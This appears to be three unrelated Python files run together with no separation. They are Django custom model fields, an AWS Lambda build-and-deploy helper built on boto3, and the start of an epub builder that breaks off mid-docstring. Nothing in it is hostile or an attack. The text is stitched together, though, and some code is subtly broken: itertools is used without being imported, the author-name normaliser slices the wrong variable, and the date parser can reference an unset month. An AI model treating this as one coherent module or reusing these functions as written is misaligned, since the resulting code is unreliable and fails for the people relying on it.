from django import forms
from django.core.exceptions import ValidationError
from django.core.validators import validate_slug
from django.db import models
from django.utils import simplejson as json
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _

from philo.forms.fields import JSONFormField
from philo.utils.registry import RegistryIterator
from philo.validators import TemplateValidator, json_validator
#from philo.models.fields.entities import *


class TemplateField(models.TextField):
	"""A :class:`TextField` which is validated with a :class:`.TemplateValidator`. ``allow``, ``disallow``, and ``secure`` will be passed into the validator's construction."""
	def __init__(self, allow=None, disallow=None, secure=True, *args, **kwargs):
		super(TemplateField, self).__init__(*args, **kwargs)
		self.validators.append(TemplateValidator(allow, disallow, secure))


class JSONDescriptor(object):
	def __init__(self, field):
		self.field = field
	
	def __get__(self, instance, owner):
		if instance is None:
			raise AttributeError # ?
		
		if self.field.name not in instance.__dict__:
			json_string = getattr(instance, self.field.attname)
			instance.__dict__[self.field.name] = json.loads(json_string)
		
		return instance.__dict__[self.field.name]
	
	def __set__(self, instance, value):
		instance.__dict__[self.field.name] = value
		setattr(instance, self.field.attname, json.dumps(value))
	
	def __delete__(self, instance):
		del(instance.__dict__[self.field.name])
		setattr(instance, self.field.attname, json.dumps(None))


class JSONField(models.TextField):
	"""A :class:`TextField` which stores its value on the model instance as a python object and stores its value in the database as JSON. Validated with :func:`.json_validator`."""
	default_validators = [json_validator]
	
	def get_attname(self):
		return "%s_json" % self.name
	
	def contribute_to_class(self, cls, name):
		super(JSONField, self).contribute_to_class(cls, name)
		setattr(cls, name, JSONDescriptor(self))
		models.signals.pre_init.connect(self.fix_init_kwarg, sender=cls)
	
	def fix_init_kwarg(self, sender, args, kwargs, **signal_kwargs):
		# Anything passed in as self.name is assumed to come from a serializer and
		# will be treated as a json string.
		if self.name in kwargs:
			value = kwargs.pop(self.name)
			
			# Hack to handle the xml serializer's handling of "null"
			if value is None:
				value = 'null'
			
			kwargs[self.attname] = value
	
	def formfield(self, *args, **kwargs):
		kwargs["form_class"] = JSONFormField
		return super(JSONField, self).formfield(*args, **kwargs)


class SlugMultipleChoiceField(models.Field):
	"""Stores a selection of multiple items with unique slugs in the form of a comma-separated list. Also knows how to correctly handle :class:`RegistryIterator`\ s passed in as choices."""
	__metaclass__ = models.SubfieldBase
	description = _("Comma-separated slug field")
	
	def get_internal_type(self):
		return "TextField"
	
	def to_python(self, value):
		if not value:
			return []
		
		if isinstance(value, list):
			return value
		
		return value.split(',')
	
	def get_prep_value(self, value):
		return ','.join(value)
	
	def formfield(self, **kwargs):
		# This is necessary because django hard-codes TypedChoiceField for things with choices.
		defaults = {
			'widget': forms.CheckboxSelectMultiple,
			'choices': self.get_choices(include_blank=False),
			'label': capfirst(self.verbose_name),
			'required': not self.blank,
			'help_text': self.help_text
		}
		if self.has_default():
			if callable(self.default):
				defaults['initial'] = self.default
				defaults['show_hidden_initial'] = True
			else:
				defaults['initial'] = self.get_default()
		
		for k in kwargs.keys():
			if k not in ('coerce', 'empty_value', 'choices', 'required',
						 'widget', 'label', 'initial', 'help_text',
						 'error_messages', 'show_hidden_initial'):
				del kwargs[k]
		
		defaults.update(kwargs)
		form_class = forms.TypedMultipleChoiceField
		return form_class(**defaults)
	
	def validate(self, value, model_instance):
		invalid_values = []
		for val in value:
			try:
				validate_slug(val)
			except ValidationError:
				invalid_values.append(val)
		
		if invalid_values:
			# should really make a custom message.
			raise ValidationError(self.error_messages['invalid_choice'] % invalid_values)
	
	def _get_choices(self):
		if isinstance(self._choices, RegistryIterator):
			return self._choices.copy()
		elif hasattr(self._choices, 'next'):
			choices, self._choices = itertools.tee(self._choices)
			return choices
		else:
			return self._choices
	choices = property(_get_choices)


try:
	from south.modelsinspector import add_introspection_rules
except ImportError:
	pass
else:
	add_introspection_rules([], ["^philo\.models\.fields\.SlugMultipleChoiceField"])
	add_introspection_rules([], ["^philo\.models\.fields\.TemplateField"])
	add_introspection_rules([], ["^philo\.models\.fields\.JSONField"])
import hashlib
import json
import logging
import os
import subprocess
import sys
import time
from collections import defaultdict

from shutil import copy
from shutil import copyfile
from shutil import copystat
from shutil import copytree
from tempfile import mkdtemp

import boto3
import botocore
import yaml
import sys

from .helpers import archive
from .helpers import get_environment_variable_value
from .helpers import LambdaContext
from .helpers import mkdir
from .helpers import read
from .helpers import timestamp


ARN_PREFIXES = {
    "cn-north-1": "aws-cn",
    "cn-northwest-1": "aws-cn",
    "us-gov-west-1": "aws-us-gov",
}

log = logging.getLogger(__name__)


def load_source(module_name, module_path):
    """Loads a python module from the path of the corresponding file."""

    if sys.version_info[0] == 3 and sys.version_info[1] >= 5:
        import importlib.util
        spec = importlib.util.spec_from_file_location(module_name, module_path)
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
    elif sys.version_info[0] == 3 and sys.version_info[1] < 5:
        import importlib.machinery
        loader = importlib.machinery.SourceFileLoader(module_name, module_path)
        module = loader.load_module()
    return module


def cleanup_old_versions(
    src, keep_last_versions, config_file="config.yaml", profile_name=None,
):
    """Deletes old deployed versions of the function in AWS Lambda.

    Won't delete $Latest and any aliased version

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param int keep_last_versions:
        The number of recent versions to keep and not delete
    """
    if keep_last_versions <= 0:
        print("Won't delete all versions. Please do this manually")
    else:
        path_to_config_file = os.path.join(src, config_file)
        cfg = read_cfg(path_to_config_file, profile_name)

        profile_name = cfg.get("profile")
        aws_access_key_id = cfg.get("aws_access_key_id")
        aws_secret_access_key = cfg.get("aws_secret_access_key")

        client = get_client(
            "lambda",
            profile_name,
            aws_access_key_id,
            aws_secret_access_key,
            cfg.get("region"),
        )

        response = client.list_versions_by_function(
            FunctionName=cfg.get("function_name"),
        )
        versions = response.get("Versions")
        if len(response.get("Versions")) < keep_last_versions:
            print("Nothing to delete. (Too few versions published)")
        else:
            version_numbers = [
                elem.get("Version") for elem in versions[1:-keep_last_versions]
            ]
            for version_number in version_numbers:
                try:
                    client.delete_function(
                        FunctionName=cfg.get("function_name"),
                        Qualifier=version_number,
                    )
                except botocore.exceptions.ClientError as e:
                    print(f"Skipping Version {version_number}: {e}")


def deploy(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
    preserve_vpc=False,
):
    """Deploys a new function to AWS Lambda.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Copy all the pip dependencies required to run your code into a temporary
    # folder then add the handler file in the root of this directory.
    # Zip the contents of this folder into a single file and output to the dist
    # directory.
    path_to_zip_file = build(
        src,
        config_file=config_file,
        requirements=requirements,
        local_package=local_package,
    )

    existing_config = get_function_config(cfg)
    if existing_config:
        update_function(
            cfg, path_to_zip_file, existing_config, preserve_vpc=preserve_vpc
        )
    else:
        create_function(cfg, path_to_zip_file)


def deploy_s3(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
    preserve_vpc=False,
):
    """Deploys a new function via AWS S3.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Copy all the pip dependencies required to run your code into a temporary
    # folder then add the handler file in the root of this directory.
    # Zip the contents of this folder into a single file and output to the dist
    # directory.
    path_to_zip_file = build(
        src,
        config_file=config_file,
        requirements=requirements,
        local_package=local_package,
    )

    use_s3 = True
    s3_file = upload_s3(cfg, path_to_zip_file, use_s3)
    existing_config = get_function_config(cfg)
    if existing_config:
        update_function(
            cfg,
            path_to_zip_file,
            existing_config,
            use_s3=use_s3,
            s3_file=s3_file,
            preserve_vpc=preserve_vpc,
        )
    else:
        create_function(cfg, path_to_zip_file, use_s3=use_s3, s3_file=s3_file)


def upload(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
):
    """Uploads a new function to AWS S3.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Copy all the pip dependencies required to run your code into a temporary
    # folder then add the handler file in the root of this directory.
    # Zip the contents of this folder into a single file and output to the dist
    # directory.
    path_to_zip_file = build(
        src,
        config_file=config_file,
        requirements=requirements,
        local_package=local_package,
    )

    upload_s3(cfg, path_to_zip_file)


def invoke(
    src,
    event_file="event.json",
    config_file="config.yaml",
    profile_name=None,
    verbose=False,
):
    """Simulates a call to your function.

    :param str src:
        The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str alt_event:
        An optional argument to override which event file to use.
    :param bool verbose:
        Whether to print out verbose details.
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Set AWS_PROFILE environment variable based on `--profile` option.
    if profile_name:
        os.environ["AWS_PROFILE"] = profile_name

    # Load environment variables from the config file into the actual
    # environment.
    env_vars = cfg.get("environment_variables")
    if env_vars:
        for key, value in env_vars.items():
            os.environ[key] = get_environment_variable_value(value)

    # Load and parse event file.
    path_to_event_file = os.path.join(src, event_file)
    event = read(path_to_event_file, loader=json.loads)

    # Tweak to allow module to import local modules
    try:
        sys.path.index(src)
    except ValueError:
        sys.path.append(src)

    handler = cfg.get("handler")
    # Inspect the handler string (<module>.<function name>) and translate it
    # into a function we can execute.
    fn = get_callable_handler_function(src, handler)

    timeout = cfg.get("timeout")
    if timeout:
        context = LambdaContext(cfg.get("function_name"), timeout)
    else:
        context = LambdaContext(cfg.get("function_name"))

    start = time.time()
    results = fn(event, context)
    end = time.time()

    print("{0}".format(results))
    if verbose:
        print(
            "\nexecution time: {:.8f}s\nfunction execution "
            "timeout: {:2}s".format(end - start, cfg.get("timeout", 15))
        )


def init(src, minimal=False):
    """Copies template files to a given directory.

    :param str src:
        The path to output the template lambda project files.
    :param bool minimal:
        Minimal possible template files (excludes event.json).
    """

    templates_path = os.path.join(
        os.path.dirname(os.path.abspath(__file__)), "project_templates",
    )
    for filename in os.listdir(templates_path):
        if (minimal and filename == "event.json") or filename.endswith(".pyc"):
            continue
        dest_path = os.path.join(templates_path, filename)

        if not os.path.isdir(dest_path):
            copy(dest_path, src)


def build(
    src,
    requirements=None,
    local_package=None,
    config_file="config.yaml",
    profile_name=None,
):
    """Builds the file bundle.

    :param str src:
       The path to your Lambda ready project (folder must contain a valid
        config.yaml and handler module (e.g.: service.py).
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    """
    # Load and parse the config file.
    path_to_config_file = os.path.join(src, config_file)
    cfg = read_cfg(path_to_config_file, profile_name)

    # Get the absolute path to the output directory and create it if it doesn't
    # already exist.
    dist_directory = cfg.get("dist_directory", "dist")
    path_to_dist = os.path.join(src, dist_directory)
    mkdir(path_to_dist)

    # Combine the name of the Lambda function with the current timestamp to use
    # for the output filename.
    function_name = cfg.get("function_name")
    output_filename = "{0}-{1}.zip".format(timestamp(), function_name)

    path_to_temp = mkdtemp(prefix="aws-lambda")
    pip_install_to_target(
        path_to_temp, requirements=requirements, local_package=local_package,
    )

    # Hack for Zope.
    if "zope" in os.listdir(path_to_temp):
        print(
            "Zope packages detected; fixing Zope package paths to "
            "make them importable.",
        )
        # Touch.
        with open(os.path.join(path_to_temp, "zope/__init__.py"), "wb"):
            pass

    # Gracefully handle whether ".zip" was included in the filename or not.
    output_filename = (
        "{0}.zip".format(output_filename)
        if not output_filename.endswith(".zip")
        else output_filename
    )

    # Allow definition of source code directories we want to build into our
    # zipped package.
    build_config = defaultdict(**cfg.get("build", {}))
    build_source_directories = build_config.get("source_directories", "")
    build_source_directories = (
        build_source_directories
        if build_source_directories is not None
        else ""
    )
    source_directories = [
        d.strip() for d in build_source_directories.split(",")
    ]

    files = []
    for filename in os.listdir(src):
        if os.path.isfile(filename):
            if filename == ".DS_Store":
                continue
            if filename == config_file:
                continue
            print("Bundling: %r" % filename)
            files.append(os.path.join(src, filename))
        elif os.path.isdir(filename) and filename in source_directories:
            print("Bundling directory: %r" % filename)
            files.append(os.path.join(src, filename))

    # "cd" into `temp_path` directory.
    os.chdir(path_to_temp)
    for f in files:
        if os.path.isfile(f):
            _, filename = os.path.split(f)

            # Copy handler file into root of the packages folder.
            copyfile(f, os.path.join(path_to_temp, filename))
            copystat(f, os.path.join(path_to_temp, filename))
        elif os.path.isdir(f):
            src_path_length = len(src) + 1
            destination_folder = os.path.join(
                path_to_temp, f[src_path_length:]
            )
            copytree(f, destination_folder)

    # Zip them together into a single file.
    # TODO: Delete temp directory created once the archive has been compiled.
    path_to_zip_file = archive("./", path_to_dist, output_filename)
    return path_to_zip_file


def get_callable_handler_function(src, handler):
    """Translate a string of the form "module.function" into a callable
    function.

    :param str src:
      The path to your Lambda project containing a valid handler file.
    :param str handler:
      A dot delimited string representing the `<module>.<function name>`.
    """

    # "cd" into `src` directory.
    os.chdir(src)

    module_name, function_name = handler.split(".")
    filename = get_handler_filename(handler)

    path_to_module_file = os.path.join(src, filename)
    module = load_source(module_name, path_to_module_file)
    return getattr(module, function_name)


def get_handler_filename(handler):
    """Shortcut to get the filename from the handler string.

    :param str handler:
      A dot delimited string representing the `<module>.<function name>`.
    """
    module_name, _ = handler.split(".")
    return "{0}.py".format(module_name)


def _install_packages(path, packages):
    """Install all packages listed to the target directory.

    Ignores any package that includes Python itself and python-lambda as well
    since its only needed for deploying and not running the code

    :param str path:
        Path to copy installed pip packages to.
    :param list packages:
        A list of packages to be installed via pip.
    """

    def _filter_blacklist(package):
        blacklist = ["-i", "#", "Python==", "python-lambda=="]
        return all(package.startswith(entry) is False for entry in blacklist)

    filtered_packages = filter(_filter_blacklist, packages)
    for package in filtered_packages:
        if package.startswith("-e "):
            package = package.replace("-e ", "")

        print("Installing {package}".format(package=package))
        subprocess.check_call(
            [
                sys.executable,
                "-m",
                "pip",
                "install",
                package,
                "-t",
                path,
                "--ignore-installed",
            ]
        )
    print(
        "Install directory contents are now: {directory}".format(
            directory=os.listdir(path)
        )
    )


def pip_install_to_target(path, requirements=None, local_package=None):
    """For a given active virtualenv, gather all installed pip packages then
    copy (re-install) them to the path provided.

    :param str path:
        Path to copy installed pip packages to.
    :param str requirements:
        If set, only the packages in the supplied requirements file are
        installed.
        If not set then installs all packages found via pip freeze.
    :param str local_package:
        The path to a local package with should be included in the deploy as
        well (and/or is not available on PyPi)
    """
    packages = []
    if not requirements:
        print("Gathering pip packages")
        pkgStr = subprocess.check_output(
            [sys.executable, "-m", "pip", "freeze"]
        )
        packages.extend(pkgStr.decode("utf-8").splitlines())
    else:
        if os.path.exists(requirements):
            print("Gathering requirement packages")
            data = read(requirements)
            packages.extend(data.splitlines())

    if not packages:
        print("No dependency packages installed!")

    if local_package is not None:
        if not isinstance(local_package, (list, tuple)):
            local_package = [local_package]
        for l_package in local_package:
            packages.append(l_package)
    _install_packages(path, packages)


def get_role_name(region, account_id, role):
    """Shortcut to insert the `account_id` and `role` into the iam string."""
    prefix = ARN_PREFIXES.get(region, "aws")
    return "arn:{0}:iam::{1}:role/{2}".format(prefix, account_id, role)


def get_account_id(
    profile_name, aws_access_key_id, aws_secret_access_key, region=None,
):
    """Query STS for a users' account_id"""
    client = get_client(
        "sts", profile_name, aws_access_key_id, aws_secret_access_key, region,
    )
    return client.get_caller_identity().get("Account")


def get_client(
    client,
    profile_name,
    aws_access_key_id,
    aws_secret_access_key,
    region=None,
):
    """Shortcut for getting an initialized instance of the boto3 client."""

    boto3.setup_default_session(
        profile_name=profile_name,
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
        region_name=region,
    )
    return boto3.client(client)


def create_function(cfg, path_to_zip_file, use_s3=False, s3_file=None):
    """Register and upload a function to AWS Lambda."""

    print("Creating your new Lambda function")
    byte_stream = read(path_to_zip_file, binary_file=True)
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")

    account_id = get_account_id(
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region",),
    )
    role = get_role_name(
        cfg.get("region"),
        account_id,
        cfg.get("role", "lambda_basic_execution"),
    )

    client = get_client(
        "lambda",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )

    # Do we prefer development variable over config?
    buck_name = os.environ.get("S3_BUCKET_NAME") or cfg.get("bucket_name")
    func_name = os.environ.get("LAMBDA_FUNCTION_NAME") or cfg.get(
        "function_name"
    )
    print("Creating lambda function with name: {}".format(func_name))

    if use_s3:
        kwargs = {
            "FunctionName": func_name,
            "Runtime": cfg.get("runtime", "python2.7"),
            "Role": role,
            "Handler": cfg.get("handler"),
            "Code": {
                "S3Bucket": "{}".format(buck_name),
                "S3Key": "{}".format(s3_file),
            },
            "Description": cfg.get("description", ""),
            "Timeout": cfg.get("timeout", 15),
            "MemorySize": cfg.get("memory_size", 512),
            "VpcConfig": {
                "SubnetIds": cfg.get("subnet_ids", []),
                "SecurityGroupIds": cfg.get("security_group_ids", []),
            },
            "Publish": True,
        }
    else:
        kwargs = {
            "FunctionName": func_name,
            "Runtime": cfg.get("runtime", "python2.7"),
            "Role": role,
            "Handler": cfg.get("handler"),
            "Code": {"ZipFile": byte_stream},
            "Description": cfg.get("description", ""),
            "Timeout": cfg.get("timeout", 15),
            "MemorySize": cfg.get("memory_size", 512),
            "VpcConfig": {
                "SubnetIds": cfg.get("subnet_ids", []),
                "SecurityGroupIds": cfg.get("security_group_ids", []),
            },
            "Publish": True,
        }

    if "tags" in cfg:
        kwargs.update(
            Tags={key: str(value) for key, value in cfg.get("tags").items()}
        )

    if "environment_variables" in cfg:
        kwargs.update(
            Environment={
                "Variables": {
                    key: get_environment_variable_value(value)
                    for key, value in cfg.get("environment_variables").items()
                },
            },
        )

    client.create_function(**kwargs)

    concurrency = get_concurrency(cfg)
    if concurrency > 0:
        client.put_function_concurrency(
            FunctionName=func_name, ReservedConcurrentExecutions=concurrency
        )


def update_function(
    cfg,
    path_to_zip_file,
    existing_cfg,
    use_s3=False,
    s3_file=None,
    preserve_vpc=False,
):
    """Updates the code of an existing Lambda function"""

    print("Updating your Lambda function")
    byte_stream = read(path_to_zip_file, binary_file=True)
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")

    account_id = get_account_id(
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region",),
    )
    role = get_role_name(
        cfg.get("region"),
        account_id,
        cfg.get("role", "lambda_basic_execution"),
    )

    client = get_client(
        "lambda",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )

    # Do we prefer development variable over config?
    buck_name = os.environ.get("S3_BUCKET_NAME") or cfg.get("bucket_name")

    if use_s3:
        client.update_function_code(
            FunctionName=cfg.get("function_name"),
            S3Bucket="{}".format(buck_name),
            S3Key="{}".format(s3_file),
            Publish=True,
        )
    else:
        client.update_function_code(
            FunctionName=cfg.get("function_name"),
            ZipFile=byte_stream,
            Publish=True,
        )

    kwargs = {
        "FunctionName": cfg.get("function_name"),
        "Role": role,
        "Runtime": cfg.get("runtime"),
        "Handler": cfg.get("handler"),
        "Description": cfg.get("description", ""),
        "Timeout": cfg.get("timeout", 15),
        "MemorySize": cfg.get("memory_size", 512),
    }

    if preserve_vpc:
        kwargs["VpcConfig"] = existing_cfg.get("Configuration", {}).get(
            "VpcConfig"
        )
        if kwargs["VpcConfig"] is None:
            kwargs["VpcConfig"] = {
                "SubnetIds": cfg.get("subnet_ids", []),
                "SecurityGroupIds": cfg.get("security_group_ids", []),
            }
        else:
            del kwargs["VpcConfig"]["VpcId"]
    else:
        kwargs["VpcConfig"] = {
            "SubnetIds": cfg.get("subnet_ids", []),
            "SecurityGroupIds": cfg.get("security_group_ids", []),
        }

    if "environment_variables" in cfg:
        kwargs.update(
            Environment={
                "Variables": {
                    key: str(get_environment_variable_value(value))
                    for key, value in cfg.get("environment_variables").items()
                },
            },
        )

    ret = client.update_function_configuration(**kwargs)

    concurrency = get_concurrency(cfg)
    if concurrency > 0:
        client.put_function_concurrency(
            FunctionName=cfg.get("function_name"),
            ReservedConcurrentExecutions=concurrency,
        )
    elif "Concurrency" in existing_cfg:
        client.delete_function_concurrency(
            FunctionName=cfg.get("function_name")
        )

    if "tags" in cfg:
        tags = {key: str(value) for key, value in cfg.get("tags").items()}
        if tags != existing_cfg.get("Tags"):
            if existing_cfg.get("Tags"):
                client.untag_resource(
                    Resource=ret["FunctionArn"],
                    TagKeys=list(existing_cfg["Tags"].keys()),
                )
            client.tag_resource(Resource=ret["FunctionArn"], Tags=tags)


def upload_s3(cfg, path_to_zip_file, *use_s3):
    """Upload a function to AWS S3."""

    print("Uploading your new Lambda function")
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")
    client = get_client(
        "s3",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )
    byte_stream = b""
    with open(path_to_zip_file, mode="rb") as fh:
        byte_stream = fh.read()
    s3_key_prefix = cfg.get("s3_key_prefix", "/dist")
    checksum = hashlib.new("md5", byte_stream).hexdigest()
    timestamp = str(time.time())
    filename = "{prefix}{checksum}-{ts}.zip".format(
        prefix=s3_key_prefix, checksum=checksum, ts=timestamp,
    )

    # Do we prefer development variable over config?
    buck_name = os.environ.get("S3_BUCKET_NAME") or cfg.get("bucket_name")
    func_name = os.environ.get("LAMBDA_FUNCTION_NAME") or cfg.get(
        "function_name"
    )
    kwargs = {
        "Bucket": "{}".format(buck_name),
        "Key": "{}".format(filename),
        "Body": byte_stream,
    }

    client.put_object(**kwargs)
    print("Finished uploading {} to S3 bucket {}".format(func_name, buck_name))
    if use_s3:
        return filename


def get_function_config(cfg):
    """Check whether a function exists or not and return its config"""

    function_name = cfg.get("function_name")
    profile_name = cfg.get("profile")
    aws_access_key_id = cfg.get("aws_access_key_id")
    aws_secret_access_key = cfg.get("aws_secret_access_key")
    client = get_client(
        "lambda",
        profile_name,
        aws_access_key_id,
        aws_secret_access_key,
        cfg.get("region"),
    )

    try:
        return client.get_function(FunctionName=function_name)
    except client.exceptions.ResourceNotFoundException as e:
        if "Function not found" in str(e):
            return False


def get_concurrency(cfg):
    """Return the Reserved Concurrent Executions if present in the config"""
    concurrency = int(cfg.get("concurrency", 0))
    return max(0, concurrency)


def read_cfg(path_to_config_file, profile_name):
    cfg = read(path_to_config_file, loader=yaml.full_load)
    if profile_name is not None:
        cfg["profile"] = profile_name
    elif "AWS_PROFILE" in os.environ:
        cfg["profile"] = os.environ["AWS_PROFILE"]
    return cfg

# Copyright (c) 2015, Max Fillinger <max@max-fillinger.net>
# 
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# 
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.

# The epub format specification is available at http://idpf.org/epub/201

'''Contains the EpubBuilder class to build epub2.0.1 files with the getebook
module.'''

import html
import re
import datetime
import getebook
import os.path
import re
import zipfile

__all__ = ['EpubBuilder', 'EpubTOC', 'Author']

def _normalize(name):
    '''Transform "Firstname [Middlenames] Lastname" into
    "Lastname, Firstname [Middlenames]".'''
    split = name.split()
    if len(split) == 1:
        return name
    return split[-1] + ', ' + ' '.join(name[0:-1])

def _make_starttag(tag, attrs):
    'Write a starttag.'
    out = '<' + tag
    for key in attrs:
        out += ' {}="{}"'.format(key, html.escape(attrs[key]))
    out += '>'
    return out

def _make_xml_elem(tag, text, attr = []):
    'Write a flat xml element.'
    out = '    <' + tag
    for (key, val) in attr:
        out += ' {}="{}"'.format(key, val)
    if text:
        out += '>{}</{}>\n'.format(text, tag)
    else:
        out += ' />\n'
    return out

class EpubTOC(getebook.TOC):
    'Table of contents.'
    _head = ((
      '<?xml version="1.0" encoding="UTF-8"?>\n'
      '<ncx xmlns="http://www.daisy.org/z3986/2005/ncx/" version="2005-1" xml:lang="en-US">\n'
      '  <head>\n'
      '    <meta name="dtb:uid" content="{}" />\n'
      '    <meta name="dtb:depth" content="{}" />\n'
      '    <meta name="dtb:totalPageCount" content="0" />\n'
      '    <meta name="dtb:maxPageNumber" content="0" />\n'
      '  </head>\n'
      '  <docTitle>\n'
      '    <text>{}</text>\n'
      '  </docTitle>\n'
    ))
    _doc_author = ((
      '  <docAuthor>\n'
      '    <text>{}</text>\n'
      '  </docAuthor>\n'
    ))
    _navp = ((
      '{0}<navPoint id="nav{1}">\n'
      '{0}  <navLabel>\n'
      '{0}    <text>{2}</text>\n'
      '{0}  </navLabel>\n'
      '{0}  <content src="{3}" />\n'
    ))

    def _navp_xml(self, entry, indent_lvl):
        'Write xml for an entry and all its subentries.'
        xml = self._navp.format('  '*indent_lvl, str(entry.no), entry.text,
          entry.target)
        for sub in entry.entries:
            xml += self._navp_xml(sub, indent_lvl+1)
        xml += '  '*indent_lvl + '</navPoint>\n'
        return xml

    def write_xml(self, uid, title, authors):
        'Write the xml code for the table of contents.'
        xml = self._head.format(uid, self.max_depth, title)
        for aut in authors:
            xml += self._doc_author.format(aut)
        xml += '  <navMap>\n'
        for entry in self.entries:
            xml += self._navp_xml(entry, 2)
        xml += '  </navMap>\n</ncx>'
        return xml

class _Fileinfo:
    'Information about a component file of an epub.'
    def __init__(self, name, in_spine = True, guide_title = None,
                 guide_type = None):
        '''Initialize the object. If the file does not belong in the
        reading order, in_spine should be set to False. If it should
        appear in the guide, set guide_title and guide_type.'''
        self.name = name
        (self.ident, ext) = os.path.splitext(name)
        name_split = name.rsplit('.', 1)
        self.ident = name_split[0]
        self.in_spine = in_spine
        self.guide_title = guide_title
        self.guide_type = guide_type
        # Infer media-type from file extension
        ext = ext.lower()
        if ext in ('.htm', '.html', '.xhtml'):
            self.media_type = 'application/xhtml+xml'
        elif ext in ('.png', '.gif', '.jpeg'):
            self.media_type = 'image/' + ext
        elif ext == '.jpg':
            self.media_type = 'image/jpeg'
        elif ext == '.css':
            self.media_type = 'text/css'
        elif ext == '.ncx':
            self.media_type = 'application/x-dtbncx+xml'
        else:
            raise ValueError('Can\'t infer media-type from extension: %s' % ext)
    def manifest_entry(self):
        'Write the XML element for the manifest.'
        return _make_xml_elem('item', '',
          [
            ('href', self.name),
            ('id', self.ident),
            ('media-type', self.media_type)
          ])
    def spine_entry(self):
        '''Write the XML element for the spine.
        (Empty string if in_spine is False.)'''
        if self.in_spine:
            return _make_xml_elem('itemref', '', [('idref', self.ident)])
        else:
            return ''
    def guide_entry(self):
        '''Write the XML element for the guide.
        (Empty string if no guide title and type are given.)'''
        if self.guide_title and self.guide_type:
            return _make_xml_elem('reference', '',
              [
                ('title', self.guide_title),
                ('type', self.guide_type),
                ('href', self.name)
              ])
        else:
            return ''

class _EpubMeta:
    'Metadata entry for an epub file.'
    def __init__(self, tag, text, *args):
        '''The metadata entry is an XML element. *args is used for
        supplying the XML element's attributes as (key, value) pairs.'''
        self.tag = tag
        self.text = text
        self.attr = args
    def write_xml(self):
        'Write the XML element.'
        return _make_xml_elem(self.tag, self.text, self.attr)
    def __repr__(self):
        'Returns the text.'
        return self.text
    def __str__(self):
        'Returns the text.'
        return self.text

class _EpubDate(_EpubMeta):
    'Metadata element for the publication date.'
    _date_re = re.compile('^([0-9]{4})(-[0-9]{2}(-[0-9]{2})?)?$')
    def __init__(self, date):
        '''date must be a string of the form "YYYY[-MM[-DD]]". If it is
        not of this form, or if the date is invalid, ValueError is
        raised.'''
        m = self._date_re.match(date) 
        if not m:
            raise ValueError('invalid date format')
        year = int(m.group(1))
        try:
            mon = int(m.group(2)[1:])
            if mon < 0 or mon > 12:
                raise ValueError('month must be in 1..12')
        except IndexError:
            pass
        try:
            day = int(m.group(3)[1:])
            datetime.date(year, mon, day) # raises ValueError if invalid
        except IndexError:
            pass
        self.tag = 'dc:date'
        self.text = date
        self.attr = ()

class _EpubLang(_EpubMeta):
    'Metadata element for the language of the book.'
    _lang_re = re.compile('^[a-z]{2}(-[A-Z]{2})?$')
    def __init__(self, lang):
        '''lang must be a lower-case two-letter language code,
        optionally followed by a "-" and a upper-case two-letter country
        code. (e.g., "en", "en-US", "en-UK", "de", "de-DE", "de-AT")'''
        if self._lang_re.match(lang):
            self.tag = 'dc:language'
            self.text = lang
            self.attr = ()
        else:
            raise ValueError('invalid language format')

class Author(_EpubMeta):
    '''To control the file-as and role attribute for the authors, pass
    an Author object to the EpubBuilder instead of a string. The file-as
    attribute is a form of the name used for sorting. The role attribute
